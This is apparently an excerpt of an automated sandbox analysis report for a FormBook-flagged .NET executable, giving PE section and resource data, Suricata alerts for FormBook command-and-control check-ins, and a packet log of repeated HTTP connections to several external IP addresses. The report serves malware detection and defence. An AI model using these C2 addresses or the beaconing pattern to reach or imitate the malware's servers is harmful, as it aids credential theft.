                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000xc85440xc860066a80c0ba66fecae7bc5c9c26a04f407False0.8885500331409857data7.73824516544036IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xcc0000x1bf00x1c00b85bb2436777e9f494e6549eb35c1cbdFalse0.8729073660714286data7.401746350570453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xce0000xc0x2003c0a0ef4f823c0ebccbdff10fb5fdc3fFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xcc0e80x174ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9639624539054643
                                                                RT_GROUP_ICON0xcd8380x14data1.05
                                                                RT_VERSION0xcd84c0x3a0data0.41594827586206895

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-09T08:43:36.387491+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249729162.0.215.3380TCP
                                                                2024-12-09T08:43:39.011783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249730162.0.215.3380TCP
                                                                2024-12-09T08:43:41.623741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249731162.0.215.3380TCP
                                                                2024-12-09T08:43:51.260792+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249733104.18.73.11680TCP
                                                                2024-12-09T08:43:53.845627+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249734104.18.73.11680TCP
                                                                2024-12-09T08:43:56.559978+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249735104.18.73.11680TCP
                                                                2024-12-09T08:44:06.861014+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249738192.185.147.10080TCP
                                                                2024-12-09T08:44:09.488062+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249739192.185.147.10080TCP
                                                                2024-12-09T08:44:12.232412+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249740192.185.147.10080TCP
                                                                2024-12-09T08:44:21.321792+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124974213.248.169.4880TCP
                                                                2024-12-09T08:44:23.989425+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124974313.248.169.4880TCP
                                                                2024-12-09T08:44:26.663334+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124974413.248.169.4880TCP
                                                                2024-12-09T08:44:37.080387+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497473.33.130.19080TCP
                                                                2024-12-09T08:44:39.683703+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497483.33.130.19080TCP
                                                                2024-12-09T08:44:42.368068+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.12497493.33.130.19080TCP
                                                                2024-12-09T08:44:52.069945+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249751104.21.38.11380TCP
                                                                2024-12-09T08:44:54.742227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249752104.21.38.11380TCP
                                                                2024-12-09T08:44:57.415681+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249753104.21.38.11380TCP
                                                                2024-12-09T08:45:45.976450+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249755103.249.106.9180TCP
                                                                2024-12-09T08:45:48.712723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249756103.249.106.9180TCP
                                                                2024-12-09T08:45:51.466321+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249757103.249.106.9180TCP
                                                                2024-12-09T08:46:01.778823+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249760121.43.155.3580TCP
                                                                2024-12-09T08:46:04.485609+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249761121.43.155.3580TCP
                                                                2024-12-09T08:46:07.139061+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249762121.43.155.3580TCP
                                                                2024-12-09T08:46:26.853604+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249764199.192.23.12380TCP
                                                                2024-12-09T08:46:29.526825+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249765199.192.23.12380TCP
                                                                2024-12-09T08:46:32.175938+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249766199.192.23.12380TCP
                                                                2024-12-09T08:46:42.249558+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124976852.60.87.16380TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 9, 2024 08:43:17.692167997 CET4972680192.168.2.12185.106.208.3
                                                                Dec 9, 2024 08:43:17.811702013 CET8049726185.106.208.3192.168.2.12
                                                                Dec 9, 2024 08:43:17.811917067 CET4972680192.168.2.12185.106.208.3
                                                                Dec 9, 2024 08:43:17.828968048 CET4972680192.168.2.12185.106.208.3
                                                                Dec 9, 2024 08:43:17.948399067 CET8049726185.106.208.3192.168.2.12
                                                                Dec 9, 2024 08:43:19.166208029 CET8049726185.106.208.3192.168.2.12
                                                                Dec 9, 2024 08:43:19.166264057 CET8049726185.106.208.3192.168.2.12
                                                                Dec 9, 2024 08:43:19.166419029 CET4972680192.168.2.12185.106.208.3
                                                                Dec 9, 2024 08:43:19.169866085 CET4972680192.168.2.12185.106.208.3
                                                                Dec 9, 2024 08:43:19.289350986 CET8049726185.106.208.3192.168.2.12
                                                                Dec 9, 2024 08:43:34.933636904 CET4972980192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:35.052927017 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:35.053039074 CET4972980192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:35.068867922 CET4972980192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:35.188112020 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:36.387365103 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:36.387392044 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:36.387403965 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:36.387490988 CET4972980192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:36.387840986 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:36.387854099 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:36.387906075 CET4972980192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:36.388295889 CET8049729162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:36.388360977 CET4972980192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:36.585418940 CET4972980192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:37.604571104 CET4973080192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:37.723845005 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:37.723920107 CET4973080192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:37.738359928 CET4973080192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:37.857708931 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:39.011579990 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:39.011666059 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:39.011678934 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:39.011782885 CET4973080192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:39.012047052 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:39.015979052 CET4973080192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:39.022665977 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:39.022699118 CET8049730162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:39.022779942 CET4973080192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:39.241827011 CET4973080192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:40.262831926 CET4973180192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:40.382261038 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:40.382339001 CET4973180192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:40.398070097 CET4973180192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:40.518186092 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:40.518224001 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:41.623529911 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:41.623619080 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:41.623631001 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:41.623740911 CET4973180192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:41.624157906 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:41.624175072 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:41.624216080 CET4973180192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:41.624372005 CET8049731162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:41.624418974 CET4973180192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:41.913785934 CET4973180192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:42.979661942 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:43.099271059 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:43.099400997 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:43.110004902 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:43.230067015 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378421068 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378458977 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378472090 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378714085 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:44.378880024 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378894091 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378907919 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378920078 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.378937960 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:44.378968000 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:44.379856110 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.379875898 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.379894018 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:44.379914999 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:44.379945993 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:44.384599924 CET4973280192.168.2.12162.0.215.33
                                                                Dec 9, 2024 08:43:44.503932953 CET8049732162.0.215.33192.168.2.12
                                                                Dec 9, 2024 08:43:49.885983944 CET4973380192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:50.005611897 CET8049733104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:50.005774975 CET4973380192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:50.020735979 CET4973380192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:50.187170982 CET8049733104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:51.260341883 CET8049733104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:51.260678053 CET8049733104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:51.260792017 CET4973380192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:51.525188923 CET4973380192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:52.542169094 CET4973480192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:52.661554098 CET8049734104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:52.661832094 CET4973480192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:52.676666021 CET4973480192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:52.796147108 CET8049734104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:53.844738960 CET8049734104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:53.845547915 CET8049734104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:53.845627069 CET4973480192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:54.184472084 CET4973480192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:55.199016094 CET4973580192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:55.318429947 CET8049735104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:55.320179939 CET4973580192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:55.335932970 CET4973580192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:55.498393059 CET8049735104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:55.498405933 CET8049735104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:56.559647083 CET8049735104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:56.559906006 CET8049735104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:56.559978008 CET4973580192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:56.851146936 CET4973580192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:57.870383024 CET4973780192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:57.990772009 CET8049737104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:57.990993023 CET4973780192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:58.000411987 CET4973780192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:58.119832993 CET8049737104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:59.185503960 CET8049737104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:59.186007977 CET8049737104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:43:59.187834024 CET4973780192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:59.188810110 CET4973780192.168.2.12104.18.73.116
                                                                Dec 9, 2024 08:43:59.308163881 CET8049737104.18.73.116192.168.2.12
                                                                Dec 9, 2024 08:44:05.274044037 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:05.393811941 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:05.393908024 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:05.425795078 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:05.545262098 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.860871077 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.860959053 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.860970974 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.861013889 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:06.861422062 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.861435890 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.861481905 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:06.861577034 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.861619949 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:06.862358093 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.862489939 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.862500906 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.862535954 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:06.863358974 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.863405943 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:06.929367065 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:06.980473995 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.980493069 CET8049738192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:06.980590105 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:06.980590105 CET4973880192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:07.947698116 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:08.067011118 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:08.067286968 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:08.082433939 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:08.201898098 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.487921000 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.488002062 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.488014936 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.488061905 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.488626957 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.488637924 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.488648891 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.488806009 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.488806009 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.489485025 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.489502907 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.489512920 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.489537001 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.490272045 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.490318060 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.585585117 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.607628107 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.607644081 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.607739925 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.608254910 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.680974007 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.680990934 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.681024075 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.681058884 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.685177088 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.685189962 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.685239077 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.693420887 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.693433046 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.693481922 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.695137024 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:09.704134941 CET8049739192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:09.704221964 CET4973980192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:10.604542971 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:10.723858118 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:10.723947048 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:10.745417118 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:10.864726067 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:10.864742041 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232300043 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232319117 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232331038 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232412100 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.232769966 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232810974 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.232968092 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232979059 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233015060 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.233108044 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233119965 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233151913 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.233891010 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233906031 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233979940 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.257260084 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.353029013 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.353099108 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.353168011 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.353250980 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.282598972 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.401947975 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:13.402151108 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.414529085 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.534060001 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:14.603224993 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:14.603244066 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:14.603424072 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:14.606357098 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:14.725577116 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:20.100122929 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:20.219598055 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:20.219733000 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:20.233211040 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:20.352673054 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:21.320544004 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:21.321290970 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:21.321791887 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:21.741673946 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:22.760935068 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:22.880390882 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:22.882544994 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:22.897825003 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:23.019695044 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:23.989308119 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:23.989384890 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:23.989424944 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:24.414376974 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.433732986 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.554250002 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:25.554339886 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.575764894 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.695278883 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:25.695319891 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:26.663047075 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:26.663130999 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:26.663333893 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:27.086324930 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.105864048 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.225773096 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:28.225858927 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.234287024 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.353705883 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:30.346880913 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:30.346901894 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:30.347029924 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:30.349854946 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:30.470009089 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:35.796797991 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:35.916238070 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:35.916332006 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:35.938441992 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:36.057986021 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:37.076947927 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:37.076975107 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:37.080387115 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:37.445776939 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.464165926 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.583693981 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:38.584171057 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.600310087 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.719800949 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:39.683572054 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:39.683640003 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:39.683702946 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:40.101423979 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.144166946 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.264854908 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:41.266144991 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.295137882 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.414568901 CET80497493.33.130.190192.168.2.12
